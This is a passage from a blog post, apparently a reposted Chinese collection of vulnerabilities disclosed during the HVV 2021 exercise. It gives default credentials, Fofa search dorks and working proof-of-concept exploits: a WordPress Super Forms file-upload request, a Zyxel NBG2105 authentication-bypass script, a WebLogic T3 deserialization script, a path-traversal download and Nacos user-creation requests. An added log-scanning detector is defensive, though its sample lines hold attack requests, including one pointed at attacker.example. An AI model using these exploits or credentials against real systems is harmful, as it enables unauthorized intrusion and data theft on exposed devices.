0x32 HIKVISION streaming media management server default credentials


POC


admin/12345


0x33 Kyan network monitoring device account/password disclosure


fofa


title="platform - Login"


POC


http:


0x34 Wayos AC centralized management system default credentials


Fofa


title="AC集中管理系统"


POC


admin/admin


0x35 WordPress Super Forms plugin arbitrary upload


Affected versions


<= 4.9.X


POC

```http
POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1      <=== exploit end point
Host: localhost
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: localhost
Connection: close
Referer: localhost
Cookie: 

-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"

jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF      <======= inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"

8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"

0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]";filename="filename.(extension)"      <==== inject code extension (.php4) for example
Content-Type: application/pdf

Evil codes to be uploaded
-----------------------------423513681827540048931513055996--
```

/wp-content/uploads/superforms/2021/01/<id>/filename.php4 (you can get <id> from the server reply).


0x36 Zyxel NBG2105 authentication bypass

POC & EXP


```python
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def poc(url):
    # The bypass is a single forged cookie, login=1, on the post-login page
    exp = url + "/login_ok.htm"
    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "cookie": "login=1",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=exp, headers=header, verify=False, timeout=10)
        if response.status_code == 200 and "GMT" in response.text:
            print(exp + " 存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")
            print("数据信息如下:")
            print(response.text)
        else:
            print(exp + " 不存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")
    except Exception as e:
        print(exp + "请求失败!!")


def main():
    url = str(input("请输入目标url:"))
    poc(url)


if __name__ == "__main__":
    main()
```


0x37 WebLogic T3 deserialization RCE


POC



```python
# Python 2 script, as published
import socket
import os
import sys
import struct
import time

if len(sys.argv) < 2:
    print 'Usage: python %s <TARGET_HOST> <PORT>' % os.path.basename(sys.argv[0])
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)

# T3 protocol handshake
headers = 't3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://abcdefghijklmnabcdefghijklmnabcdefghijklmnabcdefghijklmnabcdefghijklmnabcdefghijklmn:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data

payloadObj = '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'
payload = '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'
payload = payload + payloadObj
payload = payload + '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'
# Prefix the serialized object with its length as a big-endian 32-bit integer
payload = struct.pack('>I', len(payload)) + payload[4:]

print '[+] Sending payload...'
sock.send(payload)
time.sleep(1)
data = sock.recv(1024)
print 'received "%s"' % data
print 'send sucess'
```

0x38 Zhongxin Jindun information security management system default password


Fofa


title="中新金盾信息安全管理系统"


POC


admin/[email protected]#$


0x39 HST (好视通) video conferencing platform default credentials && arbitrary file download


Fofa


app="好视通-视频会议"


Default password POC


admin/admin


Arbitrary file download POC


/register/toDownload.do?fileName=<sensitive file path>
(https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini)


0x40 Antiy Zhuiying threat analysis system unauthorized access vulnerability


Description

By modifying the content of the response, authentication can be bypassed to log into the system directly and view some sensitive information.

POC

1. Visit the threat analysis system and capture a request to "/api/user/islogin"; the response body is


{"role": "", "login_status": false, "result": "ok"}


2. Change login_status in the request to true
3. Visit the home page again; the page loads successfully


0x41 Alibaba Nacos authentication bypass


Fofa


fofa:title="Nacos"


POC

```http
POST /nacos/v1/auth/users HTTP/1.1
Host: 127.0.0.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

username=aaaa&password=bbbb
```



```http
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 127.0.0.1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
```
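As an added defensive example (not part of the original post or of any of the projects it names): a small Python detector that scans web-server access-log lines for the request shapes shared by several entries above, namely the Solr debug/dump and replication endpoints (0x13, 0x14), the Weaver getdata.jsp sql parameter (0x05), the ZenTao pathinfo route (0x12), the Tianqing rptsvcsyncpoint parameter (0x10), the Tomcat "..;/" segment (0x15), traversal in file-name parameters (0x04, 0x31, 0x39), the Nacos user API with the Nacos-Server User-Agent (0x41) and the D-Link getuser endpoint (0x30). The combined log format, the signature names and the sample log lines are all assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote

# Apache/nginx combined log format is assumed for the constructed sample below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Query parameters that name a file in the download/overwrite entries of this post.
PATH_PARAMS = ("filename", "filepath", "path")


def classify(target, ua):
    """Return signature names matching one request target (path + query) and User-Agent.

    A hit means the request shape matches a PoC from this post; it does not prove
    that the target was vulnerable or that the request succeeded.
    """
    raw_path, _, raw_query = target.partition("?")
    path = unquote(raw_path)  # split by hand: urlsplit would treat a leading "//" as a host
    query = parse_qs(raw_query, keep_blank_values=True)
    hits = []
    # Apache Solr: debug/dump with ContentStreams; stream.url may arrive in the POST body
    if re.match(r"^/+solr/[^/]+/debug/dump$", path) and "ContentStreams" in query.get("param", []):
        hits.append("solr-contentstreams-dump")
    # Apache Solr: replication fetchindex with a caller-supplied masterUrl (SSRF)
    if (re.match(r"^/+solr/[^/]+/replication$", path)
            and "fetchindex" in query.get("command", []) and "masterUrl" in query):
        hits.append("solr-replication-ssrf")
    # Weaver OA 8: raw sql parameter passed to getdata.jsp
    if path.endswith("/js/hrm/getdata.jsp") and "getSelectAllId" in query.get("cmd", []) and "sql" in query:
        hits.append("weaver-getdata-sqli")
    # ZenTao 11.6: pathinfo route getModel-<model>-<method>-sql=<value>
    if re.search(r"/api-getModel-[^/]+-[^/]+-sql=", path, re.IGNORECASE):
        hits.append("zentao-pathinfo-sqli")
    # Tianqing: ccid carrying SQL metacharacters
    if path.endswith("/api/dp/rptsvcsyncpoint") and any(re.search(r"[';]", v) for v in query.get("ccid", [])):
        hits.append("tianqing-rptsvcsyncpoint-sqli")
    # Tomcat "..;/" normalisation-bypass segment (Seeyon ajax.do entry)
    if "..;/" in path:
        hits.append("tomcat-dotdot-semicolon-bypass")
    # Directory traversal in a file-name parameter (HIKVISION, HST, FineReport entries)
    for key, values in query.items():
        if key.lower() in PATH_PARAMS and any(".." in unquote(v).replace("\\", "/").split("/") for v in values):
            hits.append("file-param-traversal")
            break
    # Nacos: user-management API called with the server's own User-Agent
    if path.startswith("/nacos/v1/auth/users") and ua == "Nacos-Server":
        hits.append("nacos-server-ua-auth-bypass")
    # D-Link DCS: unauthenticated credential disclosure endpoint
    if path == "/config/getuser":
        hits.append("dlink-dcs-getuser")
    return hits


def scan_log(lines):
    """Parse access-log lines and return [(line_number, signature), ...]; unparsable lines are skipped."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line.strip())
        if not match:
            continue
        for signature in classify(match["target"], match["ua"]):
            findings.append((number, signature))
    return findings


# Constructed sample: one line per signature plus two benign requests at the end.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Apr/2021:10:12:01 +0800] "GET //solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.5 - - [09/Apr/2021:10:12:03 +0800] "GET /solr/db/replication?command=fetchindex&masterUrl=http://attacker.example HTTP/1.1" 200 88 "-" "curl/7.68.0"
10.0.0.6 - - [09/Apr/2021:10:13:10 +0800] "GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.0.0.6 - - [09/Apr/2021:10:13:40 +0800] "GET /zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.7 - - [09/Apr/2021:10:14:00 +0800] "GET /api/dp/rptsvcsyncpoint?ccid=1%27;create%20table%20O(T%20TEXT);-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.7 - - [09/Apr/2021:10:14:30 +0800] "GET /systemLog/downFile.php?fileName=../../../../windows/system.ini HTTP/1.1" 200 219 "-" "Mozilla/5.0"
10.0.0.8 - - [09/Apr/2021:10:15:00 +0800] "POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager HTTP/1.1" 500 70 "-" "Opera/9.80"
10.0.0.8 - - [09/Apr/2021:10:15:20 +0800] "POST /nacos/v1/auth/users HTTP/1.1" 200 20 "-" "Nacos-Server"
10.0.0.9 - - [09/Apr/2021:10:16:00 +0800] "GET /config/getuser?index=0 HTTP/1.1" 200 40 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Apr/2021:10:16:30 +0800] "GET /solr/db/select?q=*:* HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Apr/2021:10:17:00 +0800] "GET /register/toDownload.do?fileName=report.pdf HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for number, signature in scan_log(SAMPLE_LOG.splitlines()):
        print("line {}: {}".format(number, signature))
```

Point it at a real access log by replacing SAMPLE_LOG with the file's lines; a hit is a lead to confirm against the application's own logs, not a verdict.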

Sources


https://www.freebuf.com/articles/268901.html
http://www.hackdig.com/
https://github.com/hhroot/2021_Hvv/tree/8dcfdd7786ded69f404d52a162a8c4dfcbfd34b9#readme

This article is from https://www.cnblogs.com/KHZ521/p/14662410.html

Author: 追的上的梦想




This article first appeared on the WeChat public account 渗透云笔记 under the title: Some vulnerabilities and exploitation methods disclosed during HVV 2021 (POC/EXP attached for some)
